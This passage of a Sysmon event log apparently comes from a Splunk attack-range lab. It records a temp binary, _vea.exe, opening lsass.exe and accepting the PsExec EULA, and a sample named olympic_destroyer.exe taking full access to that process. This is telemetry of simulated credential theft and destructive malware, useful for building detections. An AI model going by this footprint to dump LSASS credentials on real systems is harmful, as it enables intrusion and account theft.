11:02:44.942{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1454-6216-9406-000000003802}5812C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294517Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:44.942{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1454-6216-9406-000000003802}5812C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000294516Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:02:44.874{C8EA50B7-1454-6216-9406-000000003802}5812C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 23542300x8000000000000000294515Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:44.806{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C73F94C5A78F0B1596DE5D6812018ED,SHA256=2C00387A206129E7C9FB19A26D4C21CBE0790EF28ED995238E0189F8E1CD1121,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218744Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:44.973{4F8D34B0-1454-6216-AD04-000000003902}20681260C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218743Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:44.692{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1454-6216-AD04-000000003902}2068C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218742Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:44.692{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218741Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:44.692{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218740Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:44.692{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218739Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:44.692{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218738Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:44.692{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218737Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:44.692{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218736Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:44.692{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218735Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:44.692{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218734Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:44.692{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218733Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:44.692{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1454-6216-AD04-000000003902}2068C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218732Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:44.692{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1454-6216-AD04-000000003902}2068C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218731Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:44.692{4F8D34B0-1454-6216-AD04-000000003902}2068C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218730Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:44.629{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B9EDF85D12D0F1ADB5908309A554D2C,SHA256=84FE21D5ED73711F295CF9C41BFE5ADB58AA96E6BBF0D5CD8203C3B1D725F130,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294514Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:44.742{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-1454-6216-9506-000000003802}6240C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294513Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:44.742{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1454-6216-9506-000000003802}6240C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294512Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:44.727{C8EA50B7-1454-6216-9506-000000003802}62406280C:\Windows\system32\conhost.exe{C8EA50B7-1454-6216-9406-000000003802}5812C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294511Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:44.658{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1454-6216-9506-000000003802}6240C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294510Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:44.658{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1454-6216-9506-000000003802}6240C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294509Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:44.527{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1454-6216-9406-000000003802}5812C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294508Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:44.527{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294507Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:44.527{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294506Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:44.527{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294505Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:44.527{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294504Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:44.527{C8EA50B7-12E6-6216-4B05-000000003802}67924840C:\Temp\olympic_destroyer.exe{C8EA50B7-1454-6216-9406-000000003802}5812C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+